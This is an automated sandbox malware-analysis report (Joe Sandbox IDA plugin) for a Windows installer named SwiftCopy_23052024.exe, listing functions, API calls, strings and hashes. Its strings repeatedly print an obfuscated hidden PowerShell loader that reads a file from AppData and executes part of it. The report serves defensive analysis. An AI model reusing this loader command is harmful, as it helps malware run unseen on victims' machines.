Associated: 00000000.00000002.1237130998.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SwiftCopy_23052024.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: "$Lommeregnerens178=Get-Content 'C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Venstrehaandsarbejdet.Uns';$Industrivirksomhederne=$Lommeregnerens178.SubString(7349,3);.$Industrivirksomhederne($Lommeregnerens178)"$Execute: $Execute: "powershell.exe" -windowstyle hidden "$Lommeregnerens178=Get-Content 'C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Venstrehaandsarbejdet.Uns';$Industrivirksomhederne=$Lommeregnerens178.SubString(7349,3);.$Industrivirksomhederne($Lommereg$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 717251189-2467014076
Opcode ID: ac444df92a55de95cba57e31bdc8f52323367955302fa80fe8f59512d5c2466e
Instruction ID: d98bd44868bde6ace230f91b8fcf6596fc401970515ead307cdfb18f28ae641c
Opcode Fuzzy Hash: ac444df92a55de95cba57e31bdc8f52323367955302fa80fe8f59512d5c2466e
Instruction Fuzzy Hash: EE61F471904111AEDF11AF68CC84B7E3BA49B56314F16817FE903BA2D2C73C49A2CB4E

Function 00401759 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 147
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatA.KERNEL32(00000000,00000000,"powershell.exe" -windowstyle hidden "$Lommeregnerens178=Get-Content 'C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Venstrehaandsarbejdet.Uns';$Industrivirksomhederne=$Lommeregnerens178.SubString(7349,3);.$Industrivirksomhederne($Lommeregnerens178,C:\Users\user\AppData\Roaming\fertiliseringer\Lnforskellenes,00000000,00000000,00000031), ref: 00401798
CompareFileTime.KERNEL32(-00000014,?,"powershell.exe" -windowstyle hidden "$Lommeregnerens178=Get-Content 'C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Venstrehaandsarbejdet.Uns';$Industrivirksomhederne=$Lommeregnerens178.SubString(7349,3);.$Industrivirksomhederne($Lommeregnerens178,"powershell.exe" -windowstyle hidden "$Lommeregnerens178=Get-Content 'C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Venstrehaandsarbejdet.Uns';$Industrivirksomhederne=$Lommeregnerens178.SubString(7349,3);.$Industrivirksomhederne($Lommeregnerens178,00000000,00000000,"powershell.exe" -windowstyle hidden "$Lommeregnerens178=Get-Content 'C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Venstrehaandsarbejdet.Uns';$Industrivirksomhederne=$Lommeregnerens178.SubString(7349,3);.$Industrivirksomhederne($Lommeregnerens178,C:\Users\user\AppData\Roaming\fertiliseringer\Lnforskellenes,00000000,00000000,00000031), ref: 004017C2

Part of subcall function 00405FED: lstrcpynA.KERNEL32(?,?,00000400,0040331A,Trvlemund Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00405FFA

Part of subcall function 00405114: lstrlenA.KERNEL32(Execute: "powershell.exe" -windowstyle hidden "$Lommeregnerens178=Get-Content 'C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Venstrehaandsarbejdet.Uns';$Industrivirksomhederne=$Lommeregnerens178.SubString(7349,3);.$Industrivirksomhederne($Lommereg,00000000,007969E3,771B23A0,?,?,?,?,?,?,?,?,?,00403133,00000000,?), ref: 0040514D
Part of subcall function 00405114: lstrlenA.KERNEL32(00403133,Execute: "powershell.exe" -windowstyle hidden "$Lommeregnerens178=Get-Content 'C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Venstrehaandsarbejdet.Uns';$Industrivirksomhederne=$Lommeregnerens178.SubString(7349,3);.$Industrivirksomhederne($Lommereg,00000000,007969E3,771B23A0,?,?,?,?,?,?,?,?,?,00403133,00000000), ref: 0040515D
Part of subcall function 00405114: lstrcatA.KERNEL32(Execute: "powershell.exe" -windowstyle hidden "$Lommeregnerens178=Get-Content 'C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Venstrehaandsarbejdet.Uns';$Industrivirksomhederne=$Lommeregnerens178.SubString(7349,3);.$Industrivirksomhederne($Lommereg,00403133,00403133,Execute: "powershell.exe" -windowstyle hidden "$Lommeregnerens178=Get-Content 'C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Venstrehaandsarbejdet.Uns';$Industrivirksomhederne=$Lommeregnerens178.SubString(7349,3);.$Industrivirksomhederne($Lommereg,00000000,007969E3,771B23A0), ref: 00405170
Part of subcall function 00405114: SetWindowTextA.USER32(Execute: "powershell.exe" -windowstyle hidden "$Lommeregnerens178=Get-Content 'C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Venstrehaandsarbejdet.Uns';$Industrivirksomhederne=$Lommeregnerens178.SubString(7349,3);.$Industrivirksomhederne($Lommereg,Execute: "powershell.exe" -windowstyle hidden "$Lommeregnerens178=Get-Content 'C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Venstrehaandsarbejdet.Uns';$Industrivirksomhederne=$Lommeregnerens178.SubString(7349,3);.$Industrivirksomhederne($Lommereg), ref: 00405182
Part of subcall function 00405114: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004051A8
Part of subcall function 00405114: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004051C2
Part of subcall function 00405114: SendMessageA.USER32(?,00001013,?,00000000), ref: 004051D0

Strings

C:\Users\user\AppData\Roaming\fertiliseringer\Lnforskellenes, xrefs: 00401786
cyanitic\srgetogene\runna, xrefs: 004017A3, 00401812, 00401830
"$Lommeregnerens178=Get-Content 'C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Venstrehaandsarbejdet.Uns';$Industrivirksomhederne=$Lommeregnerens178.SubString(7349,3);.$Industrivirksomhederne($Lommeregnerens178)", xrefs: 0040180D, 00401819, 00401831
open C:\Users\user\Pictures\overpointed\Frerprvernes.nyc, xrefs: 00401826, 00401842
"powershell.exe" -windowstyle hidden "$Lommeregnerens178=Get-Content 'C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Venstrehaandsarbejdet.Uns';$Industrivirksomhederne=$Lommeregnerens178.SubString(7349,3);.$Industrivirksomhederne($Lommeregnerens178, xrefs: 00401775, 0040177E, 0040178B, 0040179D, 004017AE, 004017E4, 004017FA, 00401818, 00401858, 004018D9, 004018E2, 004018EC, 004018F7

Memory Dump Source

Source File: 00000000.00000002.1236581186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1236550408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236654576.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SwiftCopy_23052024.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: "$Lommeregnerens178=Get-Content 'C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Venstrehaandsarbejdet.Uns';$Industrivirksomhederne=$Lommeregnerens178.SubString(7349,3);.$Industrivirksomhederne($Lommeregnerens178)"$"powershell.exe" -windowstyle hidden "$Lommeregnerens178=Get-Content 'C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Venstrehaandsarbejdet.Uns';$Industrivirksomhederne=$Lommeregnerens178.SubString(7349,3);.$Industrivirksomhederne($Lommeregnerens178$C:\Users\user\AppData\Roaming\fertiliseringer\Lnforskellenes$cyanitic\srgetogene\runna$open C:\Users\user\Pictures\overpointed\Frerprvernes.nyc
API String ID: 1941528284-4030911508
Opcode ID: 005cd3c5bf826a646c80fa79a2b79ed07d96123dbabc55a11dbb3bf53be87c3f
Instruction ID: 0c6c4ee3c8c955c352dd186891d8ef18ee81d47802e2f4eda18a4991a1bfe0dc
Opcode Fuzzy Hash: 005cd3c5bf826a646c80fa79a2b79ed07d96123dbabc55a11dbb3bf53be87c3f
Instruction Fuzzy Hash: D841B471900515BACB10BBB5CD46D9F36B9DF45328B20823FF522F20E2D67C8A519A6E

Function 00405114 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(Execute: "powershell.exe" -windowstyle hidden "$Lommeregnerens178=Get-Content 'C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Venstrehaandsarbejdet.Uns';$Industrivirksomhederne=$Lommeregnerens178.SubString(7349,3);.$Industrivirksomhederne($Lommereg,00000000,007969E3,771B23A0,?,?,?,?,?,?,?,?,?,00403133,00000000,?), ref: 0040514D
lstrlenA.KERNEL32(00403133,Execute: "powershell.exe" -windowstyle hidden "$Lommeregnerens178=Get-Content 'C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Venstrehaandsarbejdet.Uns';$Industrivirksomhederne=$Lommeregnerens178.SubString(7349,3);.$Industrivirksomhederne($Lommereg,00000000,007969E3,771B23A0,?,?,?,?,?,?,?,?,?,00403133,00000000), ref: 0040515D
lstrcatA.KERNEL32(Execute: "powershell.exe" -windowstyle hidden "$Lommeregnerens178=Get-Content 'C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Venstrehaandsarbejdet.Uns';$Industrivirksomhederne=$Lommeregnerens178.SubString(7349,3);.$Industrivirksomhederne($Lommereg,00403133,00403133,Execute: "powershell.exe" -windowstyle hidden "$Lommeregnerens178=Get-Content 'C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Venstrehaandsarbejdet.Uns';$Industrivirksomhederne=$Lommeregnerens178.SubString(7349,3);.$Industrivirksomhederne($Lommereg,00000000,007969E3,771B23A0), ref: 00405170
SetWindowTextA.USER32(Execute: "powershell.exe" -windowstyle hidden "$Lommeregnerens178=Get-Content 'C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Venstrehaandsarbejdet.Uns';$Industrivirksomhederne=$Lommeregnerens178.SubString(7349,3);.$Industrivirksomhederne($Lommereg,Execute: "powershell.exe" -windowstyle hidden "$Lommeregnerens178=Get-Content 'C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Venstrehaandsarbejdet.Uns';$Industrivirksomhederne=$Lommeregnerens178.SubString(7349,3);.$Industrivirksomhederne($Lommereg), ref: 00405182
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004051A8
SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004051C2
SendMessageA.USER32(?,00001013,?,00000000), ref: 004051D0

Strings

Execute: "powershell.exe" -windowstyle hidden "$Lommeregnerens178=Get-Content 'C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Venstrehaandsarbejdet.Uns';$Industrivirksomhederne=$Lommeregnerens178.SubString(7349,3);.$Industrivirksomhederne($Lommereg, xrefs: 00405134, 00405146, 0040514C, 0040516F, 0040517B

Memory Dump Source

Source File: 00000000.00000002.1236581186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1236550408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236654576.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SwiftCopy_23052024.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Execute: "powershell.exe" -windowstyle hidden "$Lommeregnerens178=Get-Content 'C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Venstrehaandsarbejdet.Uns';$Industrivirksomhederne=$Lommeregnerens178.SubString(7349,3);.$Industrivirksomhederne($Lommereg
API String ID: 2531174081-1098745096
Opcode ID: c48f88bcdd930249f21df81d58dfe132b53c9174c465f54f54d67b73826cf668
Instruction ID: bffe320471bb4ed621b5b80758aa42b14eae6e2fc0b22327473978c148379bdd
Opcode Fuzzy Hash: c48f88bcdd930249f21df81d58dfe132b53c9174c465f54f54d67b73826cf668
Instruction Fuzzy Hash: 06219D71D00518BBDF119FA9CD80ADEBFB9EF05358F10807AF904B6291C6388E418FA8

Function 00402FFB Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 161
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403062
GetTickCount.KERNEL32 ref: 004030E6
MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 0040310F
wsprintfA.USER32 ref: 0040311F

Strings

iy, xrefs: 004030C3, 004030DE, 00403155
... %d%%, xrefs: 00403119

Memory Dump Source

Source File: 00000000.00000002.1236581186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1236550408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236654576.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SwiftCopy_23052024.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: ... %d%%$iy
API String ID: 551687249-1314966281
Opcode ID: 531ab917d645672a2734b3f0630f897d8eddb27c81774d971505de7d935cfd45
Instruction ID: 7192b2bd781d1e73c4002c8dab31bcfd9076020614228c7b813c8c88a4a42f55
Opcode Fuzzy Hash: 531ab917d645672a2734b3f0630f897d8eddb27c81774d971505de7d935cfd45
Instruction Fuzzy Hash: 63517931901209ABCB10DF65DA44A9F7BBCEF18766F14413BE810BB2D0C7799B41CBA9

Function 00406317 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040632E
wsprintfA.USER32 ref: 00406367
LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040637B

Strings

\, xrefs: 0040633F
%s%s.dll, xrefs: 00406361
UXTHEME, xrefs: 00406320

Memory Dump Source

Source File: 00000000.00000002.1236581186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1236550408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236654576.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SwiftCopy_23052024.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%s.dll$UXTHEME$\
API String ID: 2200240437-4240819195
Opcode ID: 99878a05f639d6717cee7e73d8174e66263622090e4b33b6bcde024c159c7dc8
Instruction ID: 3c3b4468b6e1923fcac8586f88cca04ee8b9faba7420f287fa6fd57e775497b1
Opcode Fuzzy Hash: 99878a05f639d6717cee7e73d8174e66263622090e4b33b6bcde024c159c7dc8
Instruction Fuzzy Hash: B2F0FC70500609ABDB14ABA4DD0DFEB765CAB08304F14057AA987E10C1D678E4358B98

Function 00405BB5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405BC9
GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000006,00000008,0000000A), ref: 00405BE3

Strings

nsa, xrefs: 00405BC0
"C:\Users\user\Desktop\SwiftCopy_23052024.exe", xrefs: 00405BB5
C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405BB8

Memory Dump Source

Source File: 00000000.00000002.1236581186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1236550408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236654576.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SwiftCopy_23052024.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\SwiftCopy_23052024.exe"$C:\Users\user~1\AppData\Local\Temp\$nsa
API String ID: 1716503409-2654861455
Opcode ID: 81a8a72dc23b4af90602e2553ee1124644ae594fa0167b908fb3a738e8e2aa10
Instruction ID: d190f65444f006a88ba75eae1d2615f44ee573feb2fe82d01cd284afd59f947a
Opcode Fuzzy Hash: 81a8a72dc23b4af90602e2553ee1124644ae594fa0167b908fb3a738e8e2aa10
Instruction Fuzzy Hash: C1F082363042086BDB109F56DD04B9B7BA9DFA1750F10803BFA489A280D6B4E9558758

Function 00401C0A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C7A
SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C92

Strings

!, xrefs: 00401C46

Memory Dump Source

Source File: 00000000.00000002.1236581186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1236550408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236654576.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SwiftCopy_23052024.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: c6d7f1a8d21ebdeb4ffd3b8fca0a359ba288ccf200932861a059a96450d8fb91
Instruction ID: 70c5dabd3ba5e8ff49a6b9f2e1e1e4e729e8b40939c30b800ff2ff7c816f6e1a
Opcode Fuzzy Hash: c6d7f1a8d21ebdeb4ffd3b8fca0a359ba288ccf200932861a059a96450d8fb91
Instruction Fuzzy Hash: 91216BB1944208BEEF06AFA4DD8AAAD7FB5EB44304F10447EF501B61D1C7B88640DB18

Function 00405A73 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00405FED: lstrcpynA.KERNEL32(?,?,00000400,0040331A,Trvlemund Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00405FFA

Part of subcall function 00405A1E: CharNextA.USER32(?,?,007A0950,?,00405A8A,007A0950,007A0950,771B3410,?,C:\Users\user~1\AppData\Local\Temp\,004057D5,?,771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405A2C
Part of subcall function 00405A1E: CharNextA.USER32(00000000), ref: 00405A31
Part of subcall function 00405A1E: CharNextA.USER32(00000000), ref: 00405A45

lstrlenA.KERNEL32(007A0950,00000000,007A0950,007A0950,771B3410,?,C:\Users\user~1\AppData\Local\Temp\,004057D5,?,771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405AC6
GetFileAttributesA.KERNELBASE(007A0950,007A0950,007A0950,007A0950,007A0950,007A0950,00000000,007A0950,007A0950,771B3410,?,C:\Users\user~1\AppData\Local\Temp\,004057D5,?,771B3410,C:\Users\user~1\AppData\Local\Temp\), ref: 00405AD6

Strings

C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405A73
Pz, xrefs: 00405A79

Memory Dump Source

Source File: 00000000.00000002.1236581186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1236550408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236654576.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
